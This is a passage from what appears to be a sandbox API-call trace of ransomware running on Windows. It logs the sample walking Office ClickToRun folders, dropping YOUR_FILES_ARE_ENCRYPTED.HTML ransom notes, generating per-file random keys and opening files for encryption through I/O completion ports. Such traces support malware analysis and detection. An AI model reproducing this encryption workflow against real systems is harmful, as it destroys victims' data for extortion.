lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration" [0155.899] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*" [0155.899] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.900] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.900] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1 [0155.900] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned 79 [0155.900] GetProcessHeap () returned 0x270000 [0155.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.901] lstrcpyW (in: lpString1=0x7410060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" [0155.901] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*" [0155.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0155.901] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.901] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0155.902] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0155.902] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0155.902] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0155.902] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0155.904] CloseHandle (hObject=0x590) returned 1 [0155.904] GetProcessHeap () returned 0x270000 [0155.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: hHeap=0x270000) returned 1 [0155.905] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 0 [0155.905] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.905] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0155.905] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.906] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.908] CloseHandle (hObject=0x594) returned 1 [0155.908] GetProcessHeap () returned 0x270000 [0155.909] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.913] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 0 [0155.913] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.913] wnsprintfW (in: pszDest=0x74281b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0155.913] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.914] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.916] CloseHandle (hObject=0x58c) returned 1 [0155.916] GetProcessHeap () returned 0x270000 [0155.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74281b0 | out: hHeap=0x270000) returned 1 [0155.920] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserData", cAlternateFileName="")) returned 1 [0155.920] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData") returned 48 [0155.920] GetProcessHeap () returned 0x270000 [0155.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.922] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData" [0155.922] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*" [0155.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0155.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 0 [0155.923] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.923] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0155.923] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\userdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.923] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.925] CloseHandle (hObject=0x58c) returned 1 [0155.925] GetProcessHeap () returned 0x270000 [0155.926] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.931] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0155.931] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned 78 [0155.931] GetProcessHeap () returned 0x270000 [0155.931] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.932] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" [0155.932] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*" [0155.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.933] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0155.933] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96130e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac2a70f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x44e23, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="AirSpace.Etw.man", cAlternateFileName="AIRSPA~1.MAN")) returned 1 [0155.933] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man") returned 95 [0155.933] lstrcmpW (lpString1="AirSpace.Etw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.933] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0155.934] lstrlenW (lpString=".man") returned 4 [0155.934] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0155.934] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x773afd10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9786, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cAlternateFileName="C25A45~1.XML")) returned 1 [0155.934] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned 129 [0155.934] lstrcmpW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.934] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned=".xml" [0155.934] lstrlenW (lpString=".xml") returned 4 [0155.934] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned=".xml" [0155.934] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.934] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.934] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=38790) returned 1 [0155.934] GetProcessHeap () returned 0x270000 [0155.934] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0155.939] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CF") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="03") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="25") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AE") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="3B") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FB") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C3") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6E") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="47") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="47") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="FC") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="53") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="85") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0D") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="13") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F8") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="32") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="88") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="0B") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="59") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E4") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AF") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="77") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E1") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="71") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="67") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="DB") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F6") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F1") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="FA") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="7D") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="49") returned 2 [0155.941] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" [0155.941] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.941] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0155.942] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77b6c490, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xe048, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.accessmui.msi.16.en-us.xml", cAlternateFileName="C222C2~1.XML")) returned 1 [0155.942] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml") returned 117 [0155.942] lstrcmpW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.942] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml") returned=".xml" [0155.942] lstrlenW (lpString=".xml") returned 4 [0155.944] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml") returned=".xml" [0155.944] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.944] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0155.945] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=57416) returned 1 [0155.945] GetProcessHeap () returned 0x270000 [0155.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0155.956] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="82") returned 2 [0155.956] wsprintfW (in: 